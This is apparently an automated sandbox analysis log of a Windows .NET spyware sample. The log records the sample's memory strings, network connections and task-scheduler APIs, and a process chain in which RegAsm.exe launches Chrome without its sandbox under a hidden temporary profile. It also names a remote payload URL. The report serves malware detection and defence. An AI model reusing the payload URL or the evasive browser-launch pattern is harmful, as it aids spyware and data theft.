                    Source: chrome.exe, 0000000A.00000003.1590491499.000022640155C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1576035127.00002264016F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/intl/en-GB/about/products?tab=rh
                    Source: chrome.exe, 0000000A.00000003.1592865820.0000226401B30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search
                    Source: chrome.exe, 0000000A.00000003.1592865820.0000226401B30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com24
                    Source: chrome.exe, 0000000F.00000000.1740136236.00003584005B0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/
                    Source: chrome.exe, 0000000A.00000003.1592865820.0000226401B30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/gemini2%
                    Source: chrome.exe, 0000000A.00000003.1592865820.0000226401B30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager2
                    Source: chrome.exe, 0000000F.00000000.1740136236.00003584005B0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/oauth2/v1/userinfo
                    Source: chrome.exe, 0000000F.00000000.1740136236.00003584005B0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/oauth2/v2/tokeninfo
                    Source: chrome.exe, 0000000F.00000000.1740136236.00003584005B0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/oauth2/v4/token
                    Source: chrome.exe, 0000000F.00000000.1740136236.00003584005B0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/reauth/v1beta/users/
                    Source: chrome.exe, 0000000A.00000003.1590491499.000022640156C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/chrome/intelligence/assist/ranker/models/translate/2017/03/translate_ranker_
                    Source: chrome.exe, 0000000A.00000003.1590331102.00002264019D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/images/icons/material/system/1x/broken_image_grey600_18dp.png
                    Source: chrome.exe, 0000000A.00000003.1590658658.00002264019C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1590221542.0000226401948000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1578219000.00002264015AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1590424485.00002264019D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1590331102.00002264019D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/images/icons/material/system/2x/broken_image_grey600_18dp.png
                    Source: chrome.exe, 0000000A.00000003.1590221542.0000226401948000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1590491499.000022640155C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1576035127.00002264016F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/og/_/js/k=og.qtm.en_US.URUxVHn642A.2019.O/rt=j/m=q_dnp
                    Source: chrome.exe, 0000000A.00000003.1590221542.0000226401948000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1590491499.000022640155C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1576035127.00002264016F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/og/_/ss/k=og.qtm.yeaJaMsOWhU.L.W.O/m=qmd
                    Source: chrome.exe, 0000000A.00000003.1660141685.0000226401F38000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1655460957.0000226401D04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1659855102.00002264010D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1658202414.00002264003EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1655145696.0000226401CE8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1655823058.0000226401D14000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1658645951.0000226400324000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1656154943.0000226401D1C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1654777507.0000226401CE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1656302765.0000226401D30000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1655266401.0000226401CEC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1655015493.0000226401CE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.instagram.com/
                    Source: nEnq-0023HHHDDJKSS1000025.pif.exe, 00000000.00000002.1458694868.0000000002431000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.new.eventawardsrussia.com
                    Source: nEnq-0023HHHDDJKSS1000025.pif.exe, nEnq-0023HHHDDJKSS1000025.pif.exe, 00000000.00000000.1188960120.0000000000132000.00000002.00000001.01000000.00000003.sdmp, nEnq-0023HHHDDJKSS1000025.pif.exe, 00000000.00000002.1458694868.0000000002431000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.new.eventawardsrussia.com/wp-includes/Ypeyqku.pdf
                    Source: chrome.exe, 0000000A.00000003.1653924739.0000226401C4C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1654098546.0000226401C60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1654254518.0000226401C6C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1654177127.0000226401C64000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
                    Source: chrome.exe, 0000000A.00000003.1655460957.0000226401D04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1655145696.0000226401CE8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1654777507.0000226401CE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1655266401.0000226401CEC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1655015493.0000226401CE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/?feature=ytca
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49671 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
                    Source: unknownHTTPS traffic detected: 5.23.51.54:443 -> 192.168.2.4:49714 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 131.253.33.254:443 -> 192.168.2.4:49720 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.4:49721 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.4:49754 version: TLS 1.2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                    Source: C:\Users\user\Desktop\nEnq-0023HHHDDJKSS1000025.pif.exeCode function: 0_2_053E5960 NtResumeThread,0_2_053E5960
                    Source: C:\Users\user\Desktop\nEnq-0023HHHDDJKSS1000025.pif.exeCode function: 0_2_053E5959 NtResumeThread,0_2_053E5959
                    Source: C:\Users\user\Desktop\nEnq-0023HHHDDJKSS1000025.pif.exeCode function: 0_2_048BACB80_2_048BACB8
                    Source: C:\Users\user\Desktop\nEnq-0023HHHDDJKSS1000025.pif.exeCode function: 0_2_048BACAC0_2_048BACAC
                    Source: C:\Users\user\Desktop\nEnq-0023HHHDDJKSS1000025.pif.exeCode function: 0_2_048BB6480_2_048BB648
                    Source: C:\Users\user\Desktop\nEnq-0023HHHDDJKSS1000025.pif.exeCode function: 0_2_053E3AB00_2_053E3AB0
                    Source: C:\Users\user\Desktop\nEnq-0023HHHDDJKSS1000025.pif.exeCode function: 0_2_053E3AA10_2_053E3AA1
                    Source: C:\Users\user\Desktop\nEnq-0023HHHDDJKSS1000025.pif.exeCode function: 0_2_0661F7180_2_0661F718
                    Source: C:\Users\user\Desktop\nEnq-0023HHHDDJKSS1000025.pif.exeCode function: 0_2_0661F4200_2_0661F420
                    Source: C:\Users\user\Desktop\nEnq-0023HHHDDJKSS1000025.pif.exeCode function: 0_2_0661DE380_2_0661DE38
                    Source: C:\Users\user\Desktop\nEnq-0023HHHDDJKSS1000025.pif.exeCode function: 0_2_0661E3600_2_0661E360
                    Source: C:\Users\user\Desktop\nEnq-0023HHHDDJKSS1000025.pif.exeCode function: 0_2_066000400_2_06600040
                    Source: C:\Users\user\Desktop\nEnq-0023HHHDDJKSS1000025.pif.exeCode function: 0_2_066000280_2_06600028
                    Source: nEnq-0023HHHDDJKSS1000025.pif.exeBinary or memory string: OriginalFilename vs nEnq-0023HHHDDJKSS1000025.pif.exe
                    Source: nEnq-0023HHHDDJKSS1000025.pif.exe, 00000000.00000000.1188960120.0000000000132000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameEnq-0023HHHDDJKSS1000025.exeR vs nEnq-0023HHHDDJKSS1000025.pif.exe
                    Source: nEnq-0023HHHDDJKSS1000025.pif.exe, 00000000.00000002.1458694868.0000000002637000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameYecjyii.exe" vs nEnq-0023HHHDDJKSS1000025.pif.exe
                    Source: nEnq-0023HHHDDJKSS1000025.pif.exe, 00000000.00000002.1468133567.0000000003594000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs nEnq-0023HHHDDJKSS1000025.pif.exe
                    Source: nEnq-0023HHHDDJKSS1000025.pif.exe, 00000000.00000002.1477131675.0000000006430000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs nEnq-0023HHHDDJKSS1000025.pif.exe
                    Source: nEnq-0023HHHDDJKSS1000025.pif.exe, 00000000.00000002.1472588568.0000000005350000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs nEnq-0023HHHDDJKSS1000025.pif.exe
                    Source: nEnq-0023HHHDDJKSS1000025.pif.exe, 00000000.00000002.1473397985.0000000005750000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameYuhdtsm.dll" vs nEnq-0023HHHDDJKSS1000025.pif.exe
                    Source: nEnq-0023HHHDDJKSS1000025.pif.exe, 00000000.00000002.1458694868.0000000002476000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs nEnq-0023HHHDDJKSS1000025.pif.exe
                    Source: nEnq-0023HHHDDJKSS1000025.pif.exe, 00000000.00000002.1457127052.000000000067E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs nEnq-0023HHHDDJKSS1000025.pif.exe
                    Source: nEnq-0023HHHDDJKSS1000025.pif.exe, 00000000.00000002.1468133567.000000000380C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs nEnq-0023HHHDDJKSS1000025.pif.exe
                    Source: nEnq-0023HHHDDJKSS1000025.pif.exe, 00000000.00000002.1468133567.000000000380C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameYuhdtsm.dll" vs nEnq-0023HHHDDJKSS1000025.pif.exe
                    Source: nEnq-0023HHHDDJKSS1000025.pif.exe, 00000000.00000002.1468133567.000000000380C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameYecjyii.exe" vs nEnq-0023HHHDDJKSS1000025.pif.exe
                    Source: nEnq-0023HHHDDJKSS1000025.pif.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: nEnq-0023HHHDDJKSS1000025.pif.exe, Pbczkjjuhb.csCryptographic APIs: 'CreateDecryptor'
                    Source: 0.2.nEnq-0023HHHDDJKSS1000025.pif.exe.38bf620.1.raw.unpack, NsreGSOuS0ac1UN1Ui5.csCryptographic APIs: 'CreateDecryptor'
                    Source: 0.2.nEnq-0023HHHDDJKSS1000025.pif.exe.38bf620.1.raw.unpack, NsreGSOuS0ac1UN1Ui5.csCryptographic APIs: 'CreateDecryptor'
                    Source: 0.2.nEnq-0023HHHDDJKSS1000025.pif.exe.38bf620.1.raw.unpack, NsreGSOuS0ac1UN1Ui5.csCryptographic APIs: 'CreateDecryptor'
                    Source: 0.2.nEnq-0023HHHDDJKSS1000025.pif.exe.38bf620.1.raw.unpack, NsreGSOuS0ac1UN1Ui5.csCryptographic APIs: 'CreateDecryptor'
                    Source: 0.2.nEnq-0023HHHDDJKSS1000025.pif.exe.38670f8.5.raw.unpack, ITaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask'
                    Source: 0.2.nEnq-0023HHHDDJKSS1000025.pif.exe.38670f8.5.raw.unpack, TaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
                    Source: 0.2.nEnq-0023HHHDDJKSS1000025.pif.exe.38670f8.5.raw.unpack, Task.csTask registration methods: 'RegisterChanges', 'CreateTask'
                    Source: 0.2.nEnq-0023HHHDDJKSS1000025.pif.exe.38670f8.5.raw.unpack, TaskService.csTask registration methods: 'CreateFromToken'
                    Source: 0.2.nEnq-0023HHHDDJKSS1000025.pif.exe.3594520.4.raw.unpack, ITaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask'
                    Source: 0.2.nEnq-0023HHHDDJKSS1000025.pif.exe.3594520.4.raw.unpack, TaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
                    Source: 0.2.nEnq-0023HHHDDJKSS1000025.pif.exe.3594520.4.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                    Source: 0.2.nEnq-0023HHHDDJKSS1000025.pif.exe.3594520.4.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
                    Source: 0.2.nEnq-0023HHHDDJKSS1000025.pif.exe.3594520.4.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
                    Source: 0.2.nEnq-0023HHHDDJKSS1000025.pif.exe.38670f8.5.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                    Source: 0.2.nEnq-0023HHHDDJKSS1000025.pif.exe.38670f8.5.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                    Source: 0.2.nEnq-0023HHHDDJKSS1000025.pif.exe.38670f8.5.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                    Source: 0.2.nEnq-0023HHHDDJKSS1000025.pif.exe.38670f8.5.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.nEnq-0023HHHDDJKSS1000025.pif.exe.38670f8.5.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
                    Source: 0.2.nEnq-0023HHHDDJKSS1000025.pif.exe.38670f8.5.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
                    Source: 0.2.nEnq-0023HHHDDJKSS1000025.pif.exe.3594520.4.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.nEnq-0023HHHDDJKSS1000025.pif.exe.3594520.4.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                    Source: 0.2.nEnq-0023HHHDDJKSS1000025.pif.exe.3594520.4.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                    Source: classification engineClassification label: mal100.spyw.evad.winEXE@57/1@11/7
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RegAsm.exe.logJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutant created: NULL
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutant created: \Sessions\1\BaseNamedObjects\f3853efa76fe60ad
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Temp\ijysk4js.yewJump to behavior
                    Source: nEnq-0023HHHDDJKSS1000025.pif.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: nEnq-0023HHHDDJKSS1000025.pif.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\nEnq-0023HHHDDJKSS1000025.pif.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: chrome.exe, 0000000A.00000003.1673222151.0000226401308000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SELECT COUNT(DISTINCT CAST((event_timestamp / 1000000 / 60 / 10) AS int)) FROM metrics WHERE metrics.metric_hash = 'AD411B741D0DA012' AND metrics.metric_value > 0;
                    Source: chrome.exe, 0000000A.00000003.1673222151.0000226401308000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SELECT COUNT(DISTINCT CAST((event_timestamp / 1000000 / 60 / 10) AS int)) FROM metrics WHERE metrics.metric_hash = 'B4CFE8741404B691' AND metrics.metric_value > 0;
                    Source: nEnq-0023HHHDDJKSS1000025.pif.exeVirustotal: Detection: 26%
                    Source: nEnq-0023HHHDDJKSS1000025.pif.exeReversingLabs: Detection: 24%
                    Source: unknownProcess created: C:\Users\user\Desktop\nEnq-0023HHHDDJKSS1000025.pif.exe "C:\Users\user\Desktop\nEnq-0023HHHDDJKSS1000025.pif.exe"
                    Source: C:\Users\user\Desktop\nEnq-0023HHHDDJKSS1000025.pif.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-fre --no-default-browser-check --no-first-run --no-sandbox --allow-no-sandbox-job --disable-gpu --mute-audio --disable-audio --user-data-dir="C:\Users\user\AppData\Local\Temp\ijysk4js.yew"
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --mute-audio --user-data-dir="C:\Users\user\AppData\Local\Temp\ijysk4js.yew" --no-pre-read-main-dll --field-trial-handle=2120,i,17547587415789425831,18257902359942624357,262144 --variations-seed-version --mojo-platform-channel-handle=2396 /prefetch:3
                    Source: C:\Users\user\Desktop\nEnq-0023HHHDDJKSS1000025.pif.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-fre --no-default-browser-check --no-first-run --no-sandbox --allow-no-sandbox-job --disable-gpu --mute-audio --disable-audio --user-data-dir="C:\Users\user\AppData\Local\Temp\ijysk4js.yew"Jump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\user\AppData\Local\Temp\ijysk4js.yew /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\user\AppData\Local\Temp\ijysk4js.yew\Crashpad --metrics-dir=C:\Users\user\AppData\Local\Temp\ijysk4js.yew --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=134.0.6998.36 --initial-client-data=0x108,0x10c,0x110,0xe4,0x114,0x7ffc9d1b4f38,0x7ffc9d1b4f44,0x7ffc9d1b4f50Jump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-sandbox --user-data-dir="C:\Users\user\AppData\Local\Temp\ijysk4js.yew" --no-pre-read-main-dll --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=angle --use-angle=swiftshader-webgl --field-trial-handle=2120,i,17547587415789425831,18257902359942624357,262144 --variations-seed-version --mojo-platform-channel-handle=2116 /prefetch:2Jump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --mute-audio --user-data-dir="C:\Users\user\AppData\Local\Temp\ijysk4js.yew" --no-pre-read-main-dll --field-trial-handle=2120,i,17547587415789425831,18257902359942624357,262144 --variations-seed-version --mojo-platform-channel-handle=2396 /prefetch:3Jump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-GB --service-sandbox-type=service --no-sandbox --mute-audio --user-data-dir="C:\Users\user\AppData\Local\Temp\ijysk4js.yew" --no-pre-read-main-dll --field-trial-handle=2120,i,17547587415789425831,18257902359942624357,262144 --variations-seed-version --mojo-platform-channel-handle=2468 /prefetch:8Jump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\user\AppData\Local\Temp\ijysk4js.yew" --enable-dinosaur-easter-egg-alt-images --no-pre-read-main-dll --no-sandbox --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-GB --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --time-ticks-at-unix-epoch=-1747189763577284 --launch-time-ticks=155327286 --field-trial-handle=2120,i,17547587415789425831,18257902359942624357,262144 --variations-seed-version --mojo-platform-channel-handle=3088 /prefetch:1Jump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\user\AppData\Local\Temp\ijysk4js.yew" --enable-dinosaur-easter-egg-alt-images --no-pre-read-main-dll --no-sandbox --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-GB --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=9 --time-ticks-at-unix-epoch=-1747189763577284 --launch-time-ticks=155781375 --field-trial-handle=2120,i,17547587415789425831,18257902359942624357,262144 --variations-seed-version --mojo-platform-channel-handle=3664 /prefetch:1Jump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
